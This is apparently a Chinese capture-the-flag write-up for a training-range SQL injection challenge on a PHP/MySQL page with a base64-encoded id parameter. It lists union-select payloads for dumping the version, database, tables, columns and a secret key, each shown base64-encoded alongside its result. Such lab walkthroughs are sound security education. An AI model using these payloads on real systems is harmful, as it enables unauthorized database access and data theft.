1. 程式人生 > >SQL註入實戰-MySQL

SQL註入實戰-MySQL

SQL註入 base64 靶場

靶場地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

進入靶場詳情頁,點擊啟動靶場,根據系統提供的信息進入靶場環境。

技術分享圖片

Php註入mysql查詢語句,由地址中的“?id=MQo=”可以看出,此處傳遞時用了base64編碼,base64解碼“id=MQo=”為1,常用mysql註入語句:

這裏僅列出常用的信息註入語句:

暴出字段數 order by x

利用內置函數暴出用戶名 and 1=2 union select 1,user()

利用內置函數暴出數據庫版本 and 1=2 union select 1,version()

利用內置函數暴出數據庫名稱and 1=2 union select 1,database()暴出表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

暴出字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461(必須是表名的十六進制表示)

暴出字段內容:and 1=2 union select 1,字段名 from 表名。

由上述常用暴庫語句可以做出此題目,首先爆出數據庫版本、數據庫名稱的基本名稱。

“1 and 1=2 union select 1,version(); ”經過base64編碼得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHZlcnNpb24oKTs=”,數據庫版本為5.5.46-0ubuntu0.14.04.2:

技術分享圖片

“1 and 1=2 union select 1,database();”經過編碼得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCk7”,數據庫名稱為test:

技術分享圖片

“1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database();” 經過base64編碼得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpOw==”,數據庫表名為data:

技術分享圖片

“1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461;” 經過base64編碼得到
“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjQ2MTc0NjE7”,表內字段為id,title,main,thekey:

技術分享圖片

“1 and 1=2 union select 1,thekey from data;”經過編碼得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRoZWtleSBmcm9tIGRhdGE7”,得到KEY值。

SQL註入實戰-MySQL